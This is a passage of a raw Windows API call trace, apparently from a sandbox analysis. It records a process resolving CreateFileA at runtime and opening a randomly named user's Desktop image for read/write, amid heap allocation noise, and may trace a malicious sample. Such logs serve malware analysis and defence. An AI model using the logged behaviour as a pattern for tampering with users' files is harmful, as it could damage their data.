0x8e1a00 [0167.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0167.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0167.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0167.993] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0167.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0167.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0167.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0167.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9fa0 [0167.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9fa0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0167.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.993] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0167.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0167.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0167.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0167.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0167.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0167.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0167.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fa0 [0167.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9fa0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0167.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.994] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0167.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0167.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0167.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0167.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0167.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0167.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0167.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0167.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0167.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0167.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0167.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0167.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x36) returned 0x90ad98 [0167.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png", cchWideChar=54, lpMultiByteStr=0x90ad98, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png", lpUsedDefaultChar=0x0) returned 54 [0167.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0167.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0167.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0167.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0167.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0167.995] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vlnsdshtm2x.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0167.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0167.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0167.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0167.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0167.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0167.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0167.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0167.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0167.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0167.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0167.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0167.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=54, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0167.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6c) returned 0x906f38 [0167.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=54, lpWideCharStr=0x906f38, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png") returned 54 [0167.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0167.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0167.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0167.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0167.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0167.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0167.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0167.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0167.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0167.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0167.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0167.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0167.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0167.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0167.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0167.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0167.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0167.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0167.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0167.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0167.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0167.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0167.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0167.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0167.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0167.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0167.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0167.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0167.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0167.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0167.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0167.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0167.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0167.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0167.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0167.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0167.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0167.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0167.999] FreeLibrary (hLibModule=0x75990000) returned 1 [0167.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0167.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0167.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0167.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0168.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0168.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0168.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0168.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0168.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0168.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0168.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0168.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.001] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0168.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0168.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0168.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0168.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0168.001] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0168.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0168.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0168.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0168.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0168.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0168.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0168.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0168.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0168.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0168.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0168.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0168.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0168.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0168.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0168.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0168.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0168.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0168.012] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0168.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0168.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0168.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0168.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0168.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0168.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0168.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0168.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0168.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0168.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0168.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.013] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0168.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0168.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0168.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 